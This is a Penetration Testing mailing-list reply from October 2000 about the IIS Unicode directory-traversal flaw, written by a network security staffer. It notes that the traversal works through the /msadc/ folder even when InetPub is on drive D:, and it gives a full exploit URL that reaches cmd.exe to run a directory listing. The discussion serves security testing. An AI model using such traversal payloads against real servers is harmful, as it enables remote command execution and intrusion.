Penetration Testing mailing list archives
Re: [PEN-TEST] IIS UNICODE Strings
From: Michael Owen <mowen () COSTCO COM>
Date: Mon, 30 Oct 2000 11:22:47 -0800
In our test, the InetPub directory is in logical drive D: instead of default C:. Does that matter in the above examples? ------------------------------------- In our internal tests, it does, and the exploit won't work. BUT, if you use the /msadc/ virtual folder, it won't matter, as msadc is in c:\program files\Common\.... http://iisbox/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt /system32/cmd.exe\?/c\+dir+c:\\temp ---------------------------------- Michael Owen Costco Wholesale Network Security (425) 313-2957
Current thread:
- [PEN-TEST] IIS UNICODE Strings Mike Ahern (Oct 31)
- Re: [PEN-TEST] IIS UNICODE Strings Erick Arturo Perez Huemer (Oct 31)
- <Possible follow-ups>
- Re: [PEN-TEST] IIS UNICODE Strings Michael Owen (Oct 31)
- Re: [PEN-TEST] IIS UNICODE Strings Daniel Docekal (Oct 31)